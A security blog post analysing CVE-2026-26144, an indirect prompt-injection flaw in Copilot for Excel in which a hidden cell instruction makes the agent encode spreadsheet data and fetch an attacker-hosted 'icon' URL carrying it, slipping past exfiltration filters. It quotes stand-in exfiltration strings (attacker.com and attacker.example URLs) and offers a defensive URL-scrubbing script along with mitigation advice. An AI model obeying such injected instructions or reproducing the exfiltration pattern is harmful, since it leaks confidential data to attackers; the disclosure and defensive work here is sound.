Security Alert 2026-03-20

CVE-2026-26144: Inside the "Ghost Ledger" Copilot Excel Data Leak

Author: Dillip Chowdary, Founder & AI Researcher

Security Warning: AI agents often have broad access to your documents. To prevent sensitive PII from leaking during AI analysis, use our Developer Data Masking Tool to scrub local data before it touches any cloud-based LLM or agentic RAG pipeline.

A critical information disclosure vulnerability, designated as CVE-2026-26144, has been identified in Microsoft's Copilot integration within Excel. This flaw, dubbed "Ghost Ledger" by researchers, allows an attacker to exfiltrate sensitive enterprise spreadsheet data without any explicit user action beyond opening a document. The vulnerability highlights a fundamental weakness in current Agentic RAG (Retrieval-Augmented Generation) architectures: the lack of strict output validation for autonomous agents.

The Anatomy of the Exploit

The exploit leverages a technique known as "Indirect Prompt Injection." An attacker embeds a hidden instruction within a seemingly innocent Excel cell. When a user opens the file and Copilot performs its initial "Suggested Analysis" or "Workbook Summary," the agent reads the hidden cell. The instruction directs the agent to encode the contents of specific columns (e.g., "Salary" or "Customer Email") and append them to an image request or a markdown link to an attacker-controlled domain.

The Role of Automated Previews

What makes CVE-2026-26144 particularly dangerous is that it can trigger during the automated preview phase. Many enterprise document management systems automatically invoke AI summarizers to provide snippets for search results or file previews. In these headless environments, the agent executes the malicious instruction and sends the data back to the attacker's server, all before the user has even clicked on the file.

Technical Breakdown: Bypassing Guardrails

Microsoft's standard safety guardrails are designed to catch explicit requests for data exfiltration, such as "Send this email to x@attacker.com." However, CVE-2026-26144 bypasses these by using steganographic rendering. The agent is instructed to "summarize" the data into a high-entropy string and then "display a relevant icon from this URL: https://attacker.com/icon.png?data=[ENCODED_STRING]." Because the agent perceives this as a UI-related task (fetching an icon), it doesn't trigger the exfiltration filters.

Impact on Enterprise RAG Pipelines

This vulnerability isn't limited to the Excel desktop app. Any enterprise RAG pipeline that uses Copilot or similar agents to index and search internal spreadsheets is vulnerable. If an attacker can get a malicious file into the corporate SharePoint or OneDrive, the indexing agent will effectively act as a "data mule," carrying secrets out of the secure perimeter and into the attacker's hands.

Mitigation and Recovery

Microsoft has released a server-side patch that attempts to sanitize URLs generated by Copilot agents, but security researchers warn that polymorphic variations of the injection can still bypass these checks. For enterprises, the recommended immediate actions are:

  • Disable "Auto-Analysis" for external or untrusted documents in M365 settings.
  • Implement Egress Filtering: Block outbound requests to non-whitelisted domains from the application processes that host AI agents.
  • Data Masking: Use local tools to mask PII in spreadsheets before they are uploaded to AI-enabled cloud storage.
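The output-validation and allowlisting ideas above can be applied to the agent's rendered text before any client fetches it. The following is an added example, not Microsoft's patch or code from the original post: the allowlisted host, the thresholds, and the function names are assumptions, and the sample output is constructed.

```python
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Assumption: the only host agent-rendered output may reference (constructed name).
ALLOWED_HOSTS = {"static.intranet.example"}
MAX_VALUE_LEN = 32      # assumed cap on any single query value
ENTROPY_LIMIT = 3.5     # assumed bits/char threshold for "encoded-looking" values

# Markdown images and links: ![alt](url "title") or [text](url)
MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")

def entropy(s):
    """Shannon entropy of s in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def url_verdict(url):
    """Return None if the URL may be rendered, else the reason it is blocked."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
    except ValueError:
        return "unparseable-url"
    if parts.scheme != "https" or host not in ALLOWED_HOSTS:
        return "destination-not-allowlisted"
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) > MAX_VALUE_LEN or (
            len(value) >= 16 and entropy(value) >= ENTROPY_LIMIT
        ):
            return "suspicious-query-value"
    return None

def scrub_agent_output(markdown):
    """Strip blocked image/link targets; return (clean_text, findings)."""
    findings = []

    def replace(match):
        bang, label, url = match.groups()
        reason = url_verdict(url)
        if reason is None:
            return match.group(0)
        findings.append((url, reason))
        return f"[image removed: {label}]" if bang else label

    return MD_REF.sub(replace, markdown), findings

# Constructed sample: agent output carrying encoded cell data in an "icon" URL.
SAMPLE = ("Summary: revenue up 4%.\n\n"
          "![icon](https://attacker.example/icon.png?data=U2FsYXJ5OjEyMDAwMA==)")
```

The allowlist is the primary control here; the length and entropy checks only catch encoded values sent to a permitted host through the query string, so data placed in the URL path or subdomain still depends on the allowlist and on network egress filtering.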

The "Trust Gap" in Agentic AI

CVE-2026-26144 is a wake-up call for the AI industry. As we move from "Chatbots" to "Agents" that have the power to browse, read, and write on our behalf, the attack surface expands exponentially. We are essentially giving the AI "eyes" to see our secrets and "hands" to move them. Without a robust Zero Trust architecture for AI, where every agent action is verified and every output is scrubbed, these types of leaks will become a recurring nightmare for CSOs.

Conclusion: Securing the Future of Work

As we embrace the productivity gains of Microsoft Copilot, we must also acknowledge the inherent risks of letting an LLM "think" about our most sensitive data. CVE-2026-26144 is not just a bug; it is a symptom of a design philosophy that prioritizes capability over containment. Moving forward, the only way to safely deploy agentic AI is to treat it as an untrusted user within our networks—subject to the same, if not stricter, oversight as any human employee.
